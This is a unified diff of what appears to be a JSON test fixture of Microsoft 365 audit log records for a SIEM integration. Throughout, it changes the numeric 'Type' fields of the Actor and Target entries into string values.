 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1370,7 +1370,7 @@
 "Target": [
 {
 "ID": "00000002-0000-0ff1-ce00-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1469,15 +1469,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1500,7 +1500,7 @@
 "Target": [
 {
 "ID": "00000003-0000-0000-c000-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1599,15 +1599,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1630,7 +1630,7 @@
 "Target": [
 {
 "ID": "00000002-0000-0000-c000-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1729,15 +1729,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1760,7 +1760,7 @@
 "Target": [
 {
 "ID": "00000002-0000-0ff1-ce00-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1859,15 +1859,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1890,7 +1890,7 @@
 "Target": [
 {
 "ID": "00000003-0000-0000-c000-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -1989,15 +1989,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2020,7 +2020,7 @@
 "Target": [
 {
 "ID": "00000002-0000-0000-c000-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2119,15 +2119,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2150,7 +2150,7 @@
 "Target": [
 {
 "ID": "Unknown",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2249,15 +2249,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2280,7 +2280,7 @@
 "Target": [
 {
 "ID": "00000002-0000-0000-c000-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2379,15 +2379,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2410,7 +2410,7 @@
 "Target": [
 {
 "ID": "00000002-0000-0000-c000-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2509,15 +2509,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2540,7 +2540,7 @@
 "Target": [
 {
 "ID": "00000002-0000-0000-c000-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2639,15 +2639,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2670,7 +2670,7 @@
 "Target": [
 {
 "ID": "Unknown",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2769,15 +2769,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2800,7 +2800,7 @@
 "Target": [
 {
 "ID": "00000003-0000-0ff1-ce00-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2899,15 +2899,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2930,7 +2930,7 @@
 "Target": [
 {
 "ID": "00000002-0000-0000-c000-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3029,15 +3029,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3060,7 +3060,7 @@
 "Target": [
 {
 "ID": "00000002-0000-0000-c000-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3159,15 +3159,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3190,7 +3190,7 @@
 "Target": [
 {
 "ID": "00000003-0000-0ff1-ce00-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3289,15 +3289,15 @@
 "Actor": [
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 0
+ "Type": "0"
 },
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3320,7 +3320,7 @@
 "Target": [
 {
 "ID": "00000002-0000-0000-c000-000000000000",
- "Type": 0
+ "Type": "0"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -3419,15 +3419,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3450,7 +3450,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3549,15 +3549,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3580,7 +3580,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3679,15 +3679,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3710,7 +3710,7 @@ "Target": [ { "ID": "0f698dd4-f011-4d23-a33e-b36416dcb1e6", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3809,15 +3809,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3839,7 +3839,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -3938,15 +3938,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3970,7 +3970,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4069,7 +4069,7 @@ "Actor": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4091,7 +4091,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4184,15 +4184,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4215,7 +4215,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4314,7 +4314,7 @@ "Actor": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4336,7 +4336,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4429,15 +4429,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4461,7 +4461,7 @@ "Target": [ { "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -4560,7 +4560,7 @@ "Actor": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4582,7 +4582,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4675,15 +4675,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4707,7 +4707,7 @@ "Target": [ { "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4806,15 +4806,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4837,7 +4837,7 @@ "Target": [ { "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4936,15 +4936,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4967,7 +4967,7 @@ "Target": [ { "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5066,7 +5066,7 @@ "Actor": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5088,7 +5088,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -5181,15 +5181,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5213,7 +5213,7 @@ "Target": [ { "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5312,15 +5312,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5343,7 +5343,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5442,15 +5442,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5473,7 +5473,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5572,15 +5572,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5603,7 +5603,7 @@ "Target": [ { "ID": "00000002-0000-0ff1-ce00-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -5702,7 +5702,7 @@ "Actor": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5724,7 +5724,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5817,15 +5817,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5848,7 +5848,7 @@ "Target": [ { "ID": "00000002-0000-0ff1-ce00-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5947,15 +5947,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5978,7 +5978,7 @@ "Target": [ { "ID": "00000002-0000-0ff1-ce00-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6077,15 +6077,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6108,7 +6108,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6207,15 +6207,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -6238,7 +6238,7 @@ "Target": [ { "ID": "00000004-0000-0ff1-ce00-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6337,15 +6337,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6368,7 +6368,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6467,15 +6467,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6498,7 +6498,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6597,15 +6597,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6628,7 +6628,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6727,15 +6727,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -6758,7 +6758,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6857,15 +6857,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6888,7 +6888,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6987,15 +6987,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7018,7 +7018,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7117,15 +7117,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7148,7 +7148,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7247,15 +7247,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -7278,7 +7278,7 @@ "Target": [ { "ID": "00000002-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7377,15 +7377,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7408,7 +7408,7 @@ "Target": [ { "ID": "5f09333a-842c-47da-a157-57da27fcbca5", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7507,15 +7507,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7538,7 +7538,7 @@ "Target": [ { "ID": "Unknown", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7637,15 +7637,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7668,7 +7668,7 @@ "Target": [ { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 0 + "Type": "0" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7767,15 +7767,15 @@ "Actor": [ { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 0 + "Type": "0" }, { "ID": "asr@testsiem.onmicrosoft.com", 